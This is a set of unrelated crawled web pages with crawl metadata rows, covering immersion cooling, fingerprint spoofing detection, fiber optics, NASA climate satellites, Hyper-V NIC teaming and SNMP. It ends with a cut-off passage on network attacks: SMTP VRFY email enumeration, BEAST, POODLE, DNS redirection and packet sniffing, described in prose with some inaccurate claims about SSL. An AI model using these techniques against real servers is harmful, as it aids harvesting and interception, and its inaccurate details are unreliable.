Single-phase liquid immersion systems:
• Have just three moving parts: a coolant pump, water pump, and cooling tower/dry cooling fan.
• Can be completely enclosed or sealed within modular structures, since no airflow is required.
• Are very efficient at removing heat.
• Reduce data center power usage and cooling costs.
• Enable reallocation of power to critical IT load within the same power envelope.
• Enable easy maintenance for IT equipment — lift the lid, remove the server and set it on integrated service rails.
• Can cool up to 100 kW per rack (theoretically, up to 200 kW when used with a chilled water system).
• Increase mean time between failures (MTBF).
• Extend the life of hardware by keeping temperatures consistent and protecting it from outside air
Liquid Versus Air
While air cooling is tried and tested and has been around for decades, it is becoming a less desirable choice in today’s computing environment. Some air-cooled data centers are capable of cooling upwards of 30 to 35 kW per rack. But, in reality, air-cooled data centers become very inefficient above 15 kW per rack.
Single-phase liquid cooling works on the principle that liquid conducts heat better than air to remove heat from the servers to keep them operating efficiently and safely. It can support densities up to 200 kW per rack and is a low-maintenance solution for data centers | <urn:uuid:be6b9f6c-8005-4ecf-b649-6a121f99a2d5> | CC-MAIN-2022-40 | https://www.missioncriticalmagazine.com/articles/93683-a-look-at-liquid-immersion-cooling?utm_campaign=Newsletter%20&utm_medium=email&_hsenc=p2ANqtz-9Lg_e2oM6nJ08kne9XqddGp64O0X2vzA9QGyjJ5W-SlFz05AtDmw_gEt6Vqr2_AF0yMGngFbFFadJGYydBUE8hmj_JXUlbyR1bnwqrl3CxdvHmhbQ&utm_source=hs_email&utm_content=139808838&hsCtaTracking=beeee30a-d398-4c91-a605-01eccd06a4fb%7C7cd7aea3-9a3c-47d7-b244-b97dcb2d94c6 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00288.warc.gz | en | 0.918293 | 816 | 3.125 | 3 |
Clarkson prof tackles fake fingerprints with new software
Think you can spoof a fingerprint scanner? Clarkson University professor Stephanie Schuckers has developed unique software to improve liveness detection and detect fakes.
Concerned with the increase in fingerprint fakers, Schuckers, a professor of the Electrical and Computer Engineering Department at Clarkson University has taken the task of identifying fake fingerprints into her own hands, the Watertown Daily Times reported.
“The information about how to fake a device is pretty readily known. There have been cases where people have been caught” Schuckers said. “A scanner has no way of knowing if you’ve faked the device. We really don’t have a good sense of how often it’s happened.”
The technology she’s developed, called NexID, is currently in market. When fingerprints are captured using fingerprint scanners, an image is taken and stored in a database for use when matching later on. Fake fingerprints leave different patterns compared to that of a real fingerprint. Schuckers software can detect the difference.
“A lot of information about you is out there. Where biometrics comes in is maybe it makes things easier for us.”
While biometrics may not guarantee a more secure world, particularly considering the threat of database hacks and individual spoofing, there is still room for innovation and improvement. For Schuckers, it’s all about recognizing vulnerabilities.
“We need to recognize what those vulnerabilities are and make a decision about what level of security we desire,” she said. | <urn:uuid:6b4f82dd-10de-4206-b8a4-8199e746f955> | CC-MAIN-2022-40 | https://www.biometricupdate.com/201209/clarkson-prof-tackles-fake-fingerprints-with-new-software | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00288.warc.gz | en | 0.932494 | 328 | 2.53125 | 3 |
Thanks to many new advancements in fiber optics, researchers are looking into the potential of being able to double the capacity of fiber-optic circuits. This would allow us to run fiber over longer distances that carries more data and still manages to cost less. Data transfer and fiber optics, much like storage space or processing power, has increased exponentially in recent years and seems to show no signs of slowing down. How have fiber optics been advancing and what can we expect to see in the near future?
How Does it Work?
To understand the advancements in fiber optic infrastructure, it’s important that we first understand what might limit fiber-optic circuits first. Fiber optic cables work by transmitting beams of light that are packed inside of fiber-optic glass wires. This light needs to be amplified and recreated at regular intervals, being transmitted over thousands of miles and converted from light to electricity. The conversion process in particular is a huge limiter on how much data we’re able to transmit over fiber.
Making Data Easier (and faster)
In response to this hurdle, researchers have looked into finding ways of making the data transmitted via laser beams easier to decipher. To do this, they’ve created “guardrails” for the light beams using a device called a frequency comb, which is able to encode the information before it is transmitted. In turn, this allows for data to be accurately transmitted over longer distances without those difficult conversion needs that can be costly and inefficient.
Why Does it Matter?
This is one step towards an “all-optical” network, which would be less expensive than traditional fiber networks and would carry far more data. While optical networks have been around since the 1980s, it wasn’t until the growth of the internet–and the need for faster data transfer speeds–that we began to see fiber networks being utilized more often. That said, there’s a lot of improvement ahead of us that will likely see even more advancements in fiber optics and far more fiber being installed worldwide.
Get in Touch with FiberPlus
FiberPlus has been providing fiber optic structured cabling and data communication solutions for over 25 years in the Mid Atlantic Region and for a number of different markets. What began as a cable installation company for Local Area Networks has grown into a leading provider of innovative technology solutions improving the way our customers communicate and keeping them secure. Our solutions now include:
- Structured Cabling (inside and outside plant)
- Electronic Security Systems (Access Control & CCTV Solutions)
- Distributed Antenna Systems
- Public Safety DAS
- Audio/Video Services (Intercoms and Display Monitors)
- Support Services
- Specialty Systems
- Design/Build Services
FiberPlus promises the communities in which we serve that we will continue to expand and evolve as new technology is introduced within the telecommunications industry.
Have any questions? Interested in one of our services? Call FiberPlus today 800-394-3301, email us at firstname.lastname@example.org, or visit our contact page. Our offices are located in the Washington, DC metro area, Richmond, VA, and Columbus, OH. In Pennsylvania, please call Pennsylvania Networks, Inc. at 814-259-3999. | <urn:uuid:ce1b5cfa-b014-4506-b4f6-24d4138daaaf> | CC-MAIN-2022-40 | https://www.fiberplusinc.com/helpful-information/advances-fiber-optic-infrastructure/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00288.warc.gz | en | 0.944642 | 674 | 3.3125 | 3 |
Cutting the programs could be a logistical nightmare.
Within weeks of the U.S. election, President Donald Trump said he intended to scrap NASA’s research on climate change, shifting those resources—less than $2 billion of the agency’s $19 billion budget—to its space program.
Other Republicans have echoed that goal. Oklahoma state Sen. Jim Bridenstine, who is reportedly being considered (among others) to run NASA, once called on Barack Obama to apologize to the people of Oklahoma for funding climate change research. Texas Rep. Lamar Smith, chairman of the House committee on Science, Space and Technology, said earlier this month NASA should be focused on space, not climate change, because “another dozen agencies” are already studying the latter.
But cutting NASA’s climate science research could prove to be an expensive, logistical nightmare, according to a contractor who works as an engineer for one NASA satellite that collects climate data. The engineer requested to remain anonymous to avoid jeopardizing their employment at the agency.
NASA currently has 16 Earth science satellites in orbit (and three other Earth science instruments attached to the International Space Station) that, in addition to climate data, collect information on the atmosphere, oceans and land-based phenomena like wildfires. The satellites make up the core of NASA’s climate science program, and the most immediate problem with eliminating climate research is what would become of them.
“If you stopped operations—if nobody manned the satellites—they would crash and spread space debris,” the engineer said. NASA currently tracks around 500,000 pieces of space debris traveling at extremely high speeds; satellite engineers must steer their spacecraft to avoid them.
If a satellite crashes into a piece of debris, the satellite would splinter, possibly sending “40,000 or 50,0000 pieces of space debris into low Earth orbit,” the engineer said. “Then you have to try to account for all those pieces of debris. That would be truly a crisis. They wouldn’t de-staff our teams just because of that danger.”
Transferring satellite operations to a different agency would be costly. NASA’s Earth science satellites are operated in large part by contractors, many with five-year agreements, who use specialized equipment at NASA’s Goddard Space Flight Center in Maryland. Severing those agreements, and physically moving those machines to a different agency’s headquarters, would be a massive headache.
“All the engineers and scientists are geographically living near the center where we work,” the engineer said. “All the resources—all that stuff is geographically tied down.”
Even if the Trump administration wanted to remove those satellites from space entirely, the logistics and red tape surrounding the “deorbiting process”—delicately bringing a satellite back to Earth—can take “years and years,” said the engineer, who worries more about the administration leaving the satellites in place and simply ceasing data collection.
Budgetary waste is a common refrain among those seeking to end climate science at NASA. Because other U.S. agencies like the Environmental Protection Agency and the National Oceanographic and Atmospheric Administration also study climate change and Earth science, critics argue, there is a degree of redundancy in NASA’s work.
But redundancy isn’t wasteful; it is a basic tenet of high-quality science. If more than one set of data point to the same trend or conclusion (especially if they were collected by entirely separate scientists at separate agencies), scientists can have more confidence the conclusion is correct.
For that very reason, climate scientists often use climate data gathered by NASA, NOAA and EPA. Eliminating any of these data sources would reduce the overall diversity of data and, by default, the scientific rigor of U.S. research. It would also consolidate data collection into the hands of fewer political appointees.
Already, grassroots efforts are underway at universities around the country to download and store federal science data. “Data rescue” groups have managed to harvest NASA’s Earth science data, as well as much of NOAA’s and EPA’s data. NASA employees have taken notice.
“We’re all pretty excited by it,” the engineer said. The data rescue initiatives have gained urgency in the wake of Scott Pruitt’s confirmation as EPA administrator, as NASA employees worry he could pull EPA’s climate data from public view.
“Censorship is my No. 1 concern,” the NASA engineer said. “Once you consolidate the sources of data, it’s easier to censor.” | <urn:uuid:f3875e20-f4a1-40cf-9193-4d73a2d40f85> | CC-MAIN-2022-40 | https://www.nextgov.com/cxo-briefing/2017/02/nasa-engineer-explains-why-trumps-plan-cut-space-agencys-climate-science-program-harder-it-sounds/135764/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00288.warc.gz | en | 0.944736 | 964 | 2.875 | 3 |
With a team formed you have the failover part of LBFO figured out. But what about the load balancing piece of LBFO? That’s what this post is going to discuss.
First, think about some concepts:
- A packet sent into the NIC team should not be fragmented and sent across multiple NICs. We like BIG packets because they fill bandwidth and reduce the time to get data from A to B.
- Sometimes we need to make the path of traffic predictable … very predictable. And sometimes we don’t … but there still needs to be some organisation.
There are 2 traffic or load distribution algorithms in WS2012 NIC teaming (actually it’s more if you dig into it). The one you choose when creating/configuring a team depends on the traffic and the purpose of the team.
Hyper-V Switch Port
Generally speaking, this is the load distribution that you should use when creating a NIC team that will be used to connect a Hyper-V external virtual switch to the LAN, as below.
However, you do not have to choose this type of load distribution for this architecture, but it is my rule of thumb. Let’s get into specifics.
Hyper-V Switch Port will route traffic from a virtual NIC (either in a VM or in the management OS) to a single physical NIC in the team (a team member). Let’s illustrate that. In the below diagram, the NIC team is associating the traffic from the vNIC in VM01 with the team member called pNIC1. The traffic from the vNIC in VM02 is being sent to pNIC2. Two things to note:
- The traffic path is predictable (unless a team member fails). Incoming traffic to the virtual NICs is also going to flow through their associated physical NICs
- This is not a per-VM association. It is a per-virtual NIC association. If we add a second virtual NIC to VM01 then the traffic for that virtual NIC could be associated with any team member by the NIC team.
This is one of the things that can confuse people. They see a team of 2 NICs, maybe giving them a “2 Gbps” or “20 Gbps” pipe. True, there is a total aggregation of bandwidth, but access to that bandwidth is given on per-team member basis. That means the virtual NIC in VM02 cannot exceed 1 Gbps or 10 Gbps, depending on the speeds of the team members (physical NICs in the team).
Hyper-V Switch Port is appropriate if the team is being used for an external virtual switch (like the above examples) and:
- You have more virtual NICs than you have physical NICs. Maybe you have 2 physical NICs and 20 virtual machines. Maybe you have 2 physical NICs and you are creating a converged fabric design with 4 virtual NICs in the management OS and several virtual machines.
- You plan on using the Dynamic Virtual Machine Queue (DVMQ) hardware offload then you should use Hyper-V Switch Port traffic distribution. DVMQ uses an RSS queue device in a team member to accelerate inbound traffic to a virtual NIC. The RSS queue must be associated with the virtual NIC and that means the path of inbound traffic must come through the same team member every time… and Hyper-V Switch Port happens to do this via the association process.
As I said, there are times, when you might not use Hyper-V Switch Port. Maybe you have some massive host, and you’re going to have just 2 massive VMs on it. You could use one of the alternative load distribution algorithms then. But that’s a very rare scenario. I like to keep it simple for people: use Hyper-V Switch Port if you are creating the NIC team for a Hyper-V external virtual switch … unless you understand what’s going on under the hood and have one of those rare situations to vary.
This method of traffic distribution in the NIC team does not associate virtual NICs with team members. Instead, each packet that is sent down to the NIC team by the host/server is inspected. The destination details of the packet (which can include MAC address, IP address, and port numbers) are inspected by the team to determine which team member to send the packet to.
You can see an example of this in the below diagram. VM01 is sending 2 packets, one to address A and the other to address B. The NIC team receives the packets, performs a hashing algorithm (hence the name Address Hashing) on the destination details, and uses the results to determine the team member (physical NIC) that will send each packet. In this case, the packet being send to A goes via pNIC1 and the packet being sent to B is going via pNIC2.
In theory, this means that a virtual NIC can take advantage of all the available bandwidth in the NIC team, e.g. the full 2 Gbps or 20 Gbps. But this is completely dependent on the results of the hashing algorithm. Using the above example, if all data is going to address A, then all packets will travel through pNIC1.
And that brings us to a most common question about NIC teams and bandwidth. Say I have a host (or any server) that uses a nice big fat 20 GbE NIC team for Live Migration (or any traffic of a specific protocol). I want to test Live Migration and the NIC team. I pause the host, open up PerfMon and expect to see Live Migration using up all 20 Gbps of my NIC team. What is going on here, under the hood?
- Host1 is sending data to the single IP address of Host2 on the Live Migration network.
- Live Migration is sending packets down to the NIC team. The NIC team inspects each packet, and every one of them has the same destination details: the same MAC address, the same IP address, and same TCP port on Host2.
- The destination details are hashed and result in all of the packets being sent via a single team member, pNIC1 in this case (see the below figure).
- This limits Live Migration to the bandwidth of a single team member in the team.
That doesn’t mean Live Migration (or any other protocol – I just picked Live Migration because that’s the one Hyper-V engineers are likely to test with first) is limited to just a single team member. Maybe I have a 3rd host, Host3, and pausing Host1 will cause VMs to Live Migrate to both Host2 and Host3. The resulting hashing of destination addresses might cause the NIC team to use both team members in Host1 and give me a much better chance at fully using my lovely 20 GbE NIC team (other factors impact bandwidth utilization by Live Migration).
A misconception of Address Hashing is that packet1 to addressA will go via teamMember1, and pack2 to the same address (addressA) will go via teamMember2. I have shown that this is not the case. However, in most situations, traffic is going to all sorts of addresses and ports, and over the long term you should see different streams of traffic balancing across all of the team members in the NIC team … unless you have a 2 node Hyper-V cluster and are focusing on comms between the two hosts. In that case, you’ll see 50% utilization of a 2-team-member NIC team – and you’ll be getting the FO part of LBFO until you add a third host.
If you configure a team in the GUI, you are only going to see Hyper-V Switch Port or Address Hash as the Load Balancing Mode options. Using PowerShell, however, and you can be very precise about the type of Address Hashing that you want to do. Note that the GUI “Address Hashing” option will use these in order of preference depending on the packets:
- TransportPorts (4-Tuple Hash): Uses the source and destination UDP/TCP ports and the IP addresses to create a hash and then assigns the packets that have the matching hash value to one of the available interfaces.
- IPAddresses (2-Tuple Hash): Uses the source and destination IP addresses to create a hash and then assigns the packets that have the matching hash value to one of the available interfaces. Used when the traffic is not UDP- or TCP-based, or that detail is hidden (such as with IPsec)
- MacAddresses: Uses the source and destination MAC addresses to create a hash and then assigns the packets that have the matching hash value to one of the available interfaces. Used when the traffic is not IP-based.
My rule of thumb for Address Hashing is that I’ll use it for NIC teams that are nothing to do with a Hyper-V virtual switch, such as a NIC team in a non-host server, or a NIC team in a host that is nothing to do with a virtual switch. However, if I am using the NIC team for an external virtual switch, and I have fewer virtual NICs connecting to the virtual switch than I have team members, then I might use Address Hashing instead of Hyper-V Switch Port.
WS2012 R2 added a new load distribution mode called Dynamic. It is enabled by default and should be used. It is a blend of Address Hashing for outbound traffic and Hyper-V Port for inbound traffic. Microsoft urges you to use this default load balancing method on WS2012 R2.
This information has been brought to you by Windows Server 2012 Hyper-V Installation and Configuration Guide (available on pre-order on Amazon) where you’ll find lots of PowerShell like in this script: | <urn:uuid:0484a57d-50ec-4676-9578-596a87869b2f> | CC-MAIN-2022-40 | https://aidanfinn.com/?p=14032 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00288.warc.gz | en | 0.92533 | 2,051 | 2.515625 | 3 |
Simple Network Management Protocol (SNMP) is very popular in remote monitoring applications, so it's likely you'll work with it at some point.
When configuring your SNMP gear, you'll have questions like "What port does SNMP use?" or "Does SNMP use TCP or UDP?"
Feel free to message us for any help you may need. In the meantime, here are some of the key defaults to keep in mind as you get started:
SNMP uses both port 161 and port 162 for sending commands and messages.
The "SNMP manager" at the head of your system sends commands down to a network device, or "SNMP agent," using destination port 161.
When the agent wants to report something or respond to a command, an agent will send an "SNMP trap" on port 162 to the manager.
These two ports are fundamental defaults. They have remained the same across every version of SNMP since SNMPv1.
There are two main protocols in the Transport Layer (the layer that sits above IP): Transmission Control Protocol (TCP) and User Datagram Protocol (UDP). SNMP can be implemented over either protocol on a LAN. While SNMP over TCP is possible, SNMP packets are typically sent over UDP.
TCP vs UDP Communication
TCP is connection-based, meaning that one program establishes a connection to another and the two exchange messages across the network. TCP is also relatively heavy: it requires a three-packet handshake to set up a connection before any user data can be sent.
While TCP can be used for SNMP, the protocol was originally designed with UDP transport in mind. Although UDP may not have all the functionality of TCP, this actually makes it better for some applications. UDP is faster than TCP because it does not order packets (which can be done by the application layer), and it is a connectionless protocol. UDP is actually better suited for repetitive, low-priority functions like alarm monitoring.
Therefore, typically, SNMP uses UDP port 161 and UDP port 162.
Note: Agents listen on UDP port 161, while the manager listens for traps on UDP port 162.
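As a quick illustration of this connectionless exchange, here is a minimal Python sketch. Binding the real SNMP ports (161/162) usually requires elevated privileges, so the example uses an ephemeral loopback port as a stand-in — it demonstrates the UDP transport pattern only, not an actual SNMP implementation.

```python
import socket

def udp_round_trip(payload: bytes) -> bytes:
    """Send one datagram from an "agent" socket to a "manager" socket.

    In a real deployment the agent would listen on UDP 161 for commands
    and the manager would listen on UDP 162 for traps; here we bind port
    0 so the OS picks a free port, avoiding the need for root.
    """
    # "Manager" side: a listening socket standing in for the trap receiver.
    manager = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    manager.bind(("127.0.0.1", 0))           # 0 = any free ephemeral port
    manager.settimeout(5.0)
    manager_port = manager.getsockname()[1]

    # "Agent" side: fire a single datagram -- no handshake, no connection
    # state, which is exactly why UDP is lighter than TCP for this job.
    agent = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    agent.sendto(payload, ("127.0.0.1", manager_port))

    data, _addr = manager.recvfrom(4096)     # one recv per datagram
    agent.close()
    manager.close()
    return data

if __name__ == "__main__":
    print(udp_round_trip(b"trap goes here"))
```

Notice there is no connect/accept step anywhere: each datagram is self-contained, which is the property that makes UDP a good fit for fire-and-forget alarm traffic.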
SNMP is community-based, so there's the concept of "community string" that needs to be understood. Fortunately, it's really quite simple.
An SNMP community is something like a VLAN in the SNMP layer. Devices (management stations called "managers" and their managed devices called "agents") include a small text "community string" with each message. A receiving device will discard any message if that string doesn't match its own.
The default SNMP community string is "public" for the vast majority of devices. It's quite common for users to never change from this default, allowing all SNMP agents in the network to communicate with the (usually single) manager.
You might initially view the use of the default community string "public" as a security hole. It feels a bit like using a default password. Even the word "public" describes the people you need to keep out of your secured system.
It's probably a bigger problem, though, to think the community string offers much security at all. Even though you can obstruct unauthorized SNMP traffic by using a non-standard community string, that's not much of an obstacle for a determined intruder.
SNMP (other than SNMPv3) is unencrypted, so a "secret" community string is easy to learn. You should view the community string as a way to control the structure of management information in your network. It's not a security tool. Take care of that challenge in another layer, and/or deploy only SNMPv3-capable devices and activate encryption.
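To see why the community string is structure rather than security, consider how easily it can be read out of an unencrypted SNMPv1/v2c message, and how simply an agent's accept/discard check works. The sketch below is a deliberately minimal BER walk — it assumes single-byte length fields, which holds for typical small SNMP messages, and is not a full parser.

```python
def community_of(packet: bytes) -> str:
    """Pull the community string out of an SNMPv1/v2c message.

    An SNMPv1 message is a BER SEQUENCE of: INTEGER version,
    OCTET STRING community, then the PDU. This walk assumes
    short-form (single-byte) lengths for brevity.
    """
    if not packet or packet[0] != 0x30:          # outer SEQUENCE tag
        raise ValueError("not an SNMP message")
    i = 2                                        # skip SEQUENCE tag + length
    if packet[i] != 0x02:                        # INTEGER: version
        raise ValueError("missing version field")
    ver_len = packet[i + 1]
    i += 2 + ver_len
    if packet[i] != 0x04:                        # OCTET STRING: community
        raise ValueError("missing community field")
    com_len = packet[i + 1]
    return packet[i + 2 : i + 2 + com_len].decode("ascii")

def accept(packet: bytes, my_community: str) -> bool:
    """Mimic an agent's check: silently discard on any mismatch."""
    try:
        return community_of(packet) == my_community
    except (ValueError, IndexError):
        return False
```

Because the community string travels in plain text like this, anyone who can capture a packet can read it — which is exactly why it should be treated as an organizational label, not a password.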
SNMPv3 is the most secure version of the SNMP protocol. SNMPv3 uses the same ports as SNMPv1 and SNMPv2c: port 161 for polling and port 162 for notifications (trap messages, for example).
Any manufacturer can make a device SNMP-capable, so there must be an agreed-upon standard to allow managers and agents to communicate.
That standard is the Management Information Base (MIB). This is a human-readable ASN.1 text file that is parsed by the SNMP manager. It's a bit like a driver file that describes the various things an SNMP-equipped device can do.
If you need to understand the specifics of your SNMP device, the MIB is a great place to look. It's a bit cryptic at first, but you'll get the hang of it fairly quickly.
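Conceptually, a parsed MIB boils down to a mapping between numeric object identifiers (OIDs) and human-readable names. The sketch below hard-codes a few entries from the standard MIB-II "system" group (RFC 1213) as a stand-in for a real MIB parser, which would load thousands of such definitions from MIB files.

```python
# A handful of scalar OIDs from the MIB-II "system" group, with the
# trailing .0 instance suffix used when polling scalar values. A real
# manager builds this table by parsing the ASN.1 MIB files themselves.
MIB_II_SYSTEM = {
    "1.3.6.1.2.1.1.1.0": "sysDescr",
    "1.3.6.1.2.1.1.3.0": "sysUpTime",
    "1.3.6.1.2.1.1.5.0": "sysName",
    "1.3.6.1.2.1.1.6.0": "sysLocation",
}

def pretty(oid: str) -> str:
    """Translate a numeric OID to its MIB name, or echo it back unknown."""
    return MIB_II_SYSTEM.get(oid, oid)
```

This is why the MIB matters in practice: without it, a trap or poll response is just a string of dotted numbers; with it, the manager can display "sysName" instead of "1.3.6.1.2.1.1.5.0".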
Some examples of RTUs with UDP capability are the NetGuardian 832A, NetGuardian 216 and the NetGuardian LT by DPS Telecom. These RTUs are SNMP compatible and range in discrete input size, allowing your company to select the RTU that fits your needs perfectly. Additionally, they all have UDP capability.
The NetGuardian 832A has 32 discrete alarms and 8 analog alarms, pings 32 network elements, controls 8 relays, provides LAN reach-through access to 8 serial ports, and reports via SNMPv3. Even though it fits in just 1 RU of rack space, it is perfect for larger sites.
The NetGuardian 832A G5 has dual Ethernet support for secure network access - both NICs have access to the NetGuardian but not to each other. Additionally, the NetGuardian 832A G5 features a wide range of options and expansion units, so that you get a unit with the perfect capacity for your specific needs.
With this NetGuardian, you can not only send SNMP Traps, but you can also monitor a wide range of other units and sensors. For a large network, the NetGuardian 832A has the ability to report alarms to multiple SNMP managers or TMon Remote Alarm Monitoring System, so it's easier than ever to support a more secure redundant master architecture.
The NetGuardian 216 is a mid-sized RTU. It has the capacity to monitor 16 discrete alarms and 8 analog alarms, pings 32 network elements, controls 2 relays, provides LAN reach-through access to 7 network elements, and reports via SNMP. As mentioned above, the NetGuardian 216 works with the SMS Receiver (discussed below) to report alarms via SMS, either direct to your mobile phone or to your alarm master. You'll be the first to know about a problem.
The smallest of the three RTUs is the NetGuardian LT. The NetGuardian LT G2 is a compact, LAN-based, and rack-mounted remote telemetry unit (RTU). This device is easy to install and features a light capacity - making it the perfect RTU to deploy at small remote sites with just 4 discretes.
Based on the time-tested NetGuardian design, this telco-grade remote is housed in a durable aluminum chassis and is scaled to be a perfect-fit solution where a large-capacity RTU would be more than you need. It can also take 1 analog input and supports SNMP. With other options available, this RTU, like the others, is customizable to fit your monitoring needs.
Yet another SNMP transport method is SMS, using an SMS receiver. Your wireless RTU sends alarms to the SMS receiver, which then forwards them to your master station. As usual, the master station then alerts techs or other appropriate personnel that there is a problem.
The SMS Receiver by DPS Telecom allows you to use your wireless RTUs with your alarm master station without paying for an expensive third-party data provider or opening a hole in your firewall to receive alarms on your master station.
Wireless RTUs previously created a lot of unwanted trouble for companies. To send alarms to your master station, you had to pay your cellular carrier or a third-party data provider for a static IP address. Then, you had to punch a hole in your firewall to get that data back into your network - a security risk that some IT departments simply weren't willing to take.
Rather than reporting alarms over IP, simply configure your wireless RTU to send SMS alarm notifications to your SMS Receiver. The SMS Receiver then parses the SMS Notification and forwards an SNMP trap to your T/Mon or alarm master station over LAN.
Reporting alarms via SMS rather than IP allows you to bypass the traditional hassles of wireless IP-based alarm reporting. One SMS Receiver can report alarms for multiple RTUs as well, allowing you to cheaply and easily employ wireless RTUs or establish a backup alarm-reporting path over wireless devices.
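The parse-and-forward step might look roughly like the following Python sketch. The semicolon-delimited message format and the placeholder OIDs are invented for illustration; they are not the actual NetGuardian or SMS Receiver formats:

```python
def parse_sms_alarm(sms: str) -> dict:
    # Hypothetical format: "<site>;<alarm description>;<severity>"
    site, description, severity = sms.split(";")
    return {"site": site, "description": description, "severity": severity}

def to_trap_varbinds(alarm: dict) -> list:
    # Repackage the parsed fields as SNMP trap variable bindings.
    # The OIDs are placeholders, not a real enterprise MIB.
    return [
        ("1.3.6.1.4.1.99999.1.1", alarm["site"]),
        ("1.3.6.1.4.1.99999.1.2", alarm["description"]),
        ("1.3.6.1.4.1.99999.1.3", alarm["severity"]),
    ]

alarm = parse_sms_alarm("SITE-12;HIGH TEMP;CRITICAL")
print(to_trap_varbinds(alarm)[2])  # ('1.3.6.1.4.1.99999.1.3', 'CRITICAL')
```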
We've been helping companies with their network monitoring systems since 1986. If you need help with your project, let us know how we can help!
Vulnerable Networks and Services – a Gateway for Intrusion
Communication and network protocols form a big part of the cyber-attack landscape, so many threats are directed at the networks and communication channels used by people, systems, and devices. At a time when there are millions of IoT devices, employees bring their personal devices to the workplace under BYOD policies, cloud adoption is widespread, and many organizations depend on web-based systems, it is obvious why cyber criminals consider networks and communication channels a sweet spot for attacks. Many attack techniques and tools have therefore been developed purposefully to exploit common vulnerabilities in networks and communication channels.
Vulnerable network protocols and network intrusions
Networks, including the internet, were established at a time when there were hardly any cybersecurity threats aimed at them, so the focus was on aspects such as performance and speed. Because security was not designed into early networks, several adaptations have had to be incorporated as cybersecurity threats increased. However, this has become a catch-up game, and hackers are unfortunately growing more powerful. As a result, several vulnerabilities have been discovered in network protocols. The following are some internet protocols that are increasingly insecure:
Simple Mail Transfer Protocol
Simple Mail Transfer Protocol (SMTP) is used for email by many organizations. This protocol was added to the internet and quickly became the simplest way for people and organizations to send and receive email. However, there has been an explosion of threats targeting the SMTP protocol that many organizations use. Since SMTP wasn't conceived with these security issues in mind, securing it has become the burden of network administrators. One of the ways SMTP is attacked is account enumeration, normally done by spammers and phishers when harvesting emails. Account enumeration verifies whether an email account is registered on a certain server by running an SMTP command called VRFY on port 25. The response obtained shows whether or not the email address is valid.
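Enumeration works because the reply codes differ: per RFC 5321, 250 confirms the address, 550 rejects it, and 251/252 are inconclusive "will accept anyway" replies. A simplified sketch of the decision logic a harvester might apply (illustrative, not taken from any real tool):

```python
def vrfy_result(reply_code: int) -> str:
    # Interpret the server's reply to "VRFY <address>" on port 25.
    if reply_code == 250:
        return "valid"          # mailbox confirmed
    if reply_code in (251, 252):
        return "inconclusive"   # server won't verify but may accept mail
    if reply_code == 550:
        return "invalid"        # mailbox unavailable / not registered
    return "unknown"

print(vrfy_result(250))  # valid
print(vrfy_result(550))  # invalid
```

This is why many administrators disable or restrict VRFY: a consistent non-committal reply gives harvesters nothing to work with.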
Secure Sockets Layer
Secure Sockets Layer (SSL) has been understood by many people as the ultimate check of security. Users are advised to check whether a website has SSL before they submit private data to it. SSL works by encrypting data exchanged between a host and server, making it hardly possible for a hacker to intercept and read the contents of the traffic. However, there is a challenge with this approach to cybersecurity as the ultimate check for security. SSL has been active since 1996 and has never received any update despite the increased sophistication of hacking techniques. There have been several attacks against SSL security that have made browsers such as Chrome and Firefox want to scrap SSL. The answer to SSL has been Transport Layer Security (TLS), but it isn't without flaws. TLS arrived in 1999 as the successor to SSL version 3.0, yet SSL is still more commonly used on the internet.
TLS is a crypto-protocol used in internet communications to provide end-to-end encryption for all data exchanged between a client and a server. It's more secure than SSL but still faces its fair share of cyber attacks. One of the attacks against TLS is known as BEAST and is registered as CVE-2011-3389 in the CVE database. In this attack, the attacker injects their own packets into the stream of SSL traffic, which enables them to work out how the traffic is encrypted and thus decrypt it. Another attack against SSL is POODLE, registered as CVE-2014-3566 in the CVE database. POODLE is an ingenious way of attacking SSL used in man-in-the-middle attacks. When a client initiates the SSL handshake, the attacker intercepts the traffic, masquerades as the server, and requests that the client downgrade to SSL 3.0. The POODLE attack happens when the attacker replaces the padding bytes in packets and then forwards the packets to the real server. Servers don't check the values in the padding; they're only concerned with the message-authentication code of the plaintext and the padding length. The man-in-the-middle then observes the response from the server to learn what plaintext message the real client sent.
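The padding weakness can be shown with a toy model. The "server" below validates the MAC over the plaintext and the padding-length byte but never the padding bytes themselves, a simplified stand-in for the SSL 3.0 behavior POODLE abuses, not a real protocol implementation:

```python
import hmac
import hashlib

KEY = b"toy-server-mac-key"

def server_accepts(plaintext: bytes, padding: bytes, mac: bytes) -> bool:
    # SSL 3.0-style check (simplified): the final padding byte encodes the
    # padding length, and only the plaintext is covered by the MAC.
    if not padding or padding[-1] != len(padding) - 1:
        return False
    expected = hmac.new(KEY, plaintext, hashlib.sha256).digest()
    return hmac.compare_digest(mac, expected)

msg = b"GET /account HTTP/1.1"
mac = hmac.new(KEY, msg, hashlib.sha256).digest()

honest = bytes([0, 0, 0, 3])    # three padding bytes + a length byte
tampered = bytes([7, 7, 7, 3])  # attacker-replaced padding bytes

print(server_accepts(msg, honest, mac))    # True
print(server_accepts(msg, tampered, mac))  # True -- padding content is never checked
```

Because both messages are accepted, an attacker can substitute ciphertext into the padding region and learn about the plaintext from whether the server accepts or rejects each guess.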
Domain Name System
Domain Name System (DNS) is the protocol that translates domain names into IP addresses. However, this protocol is old, flawed, and open to attacks. A hacking group was once able to exploit the workings of the protocol, causing users who wanted to visit twitter.com to be redirected to a different domain. Should a significant number of threat actors decide to redirect visitors of certain websites to different or malicious sites, they can do this through DNS attacks, in which hackers swap the correct IP address of a website for a rogue one. Fixes have been developed, but they have affected performance and thus have not been implemented; more practical fixes are still in the works. Apart from the internet, there are other attacks that are regularly directed at organizational networks. These are more successful due to the narrow scope on which attackers can focus. The following are some of these attacks:
Packet sniffing
This is where an attacker reads all the data being exchanged on a network, especially if it's unencrypted. Surprisingly, there are many free and open-source programs that can be used to do this, such as Wireshark. Public networks, such as cafe WiFi hotspots, are some of the places where hackers regularly use these programs to record, read, and analyze the traffic flowing through the network.
Distributed denial of service
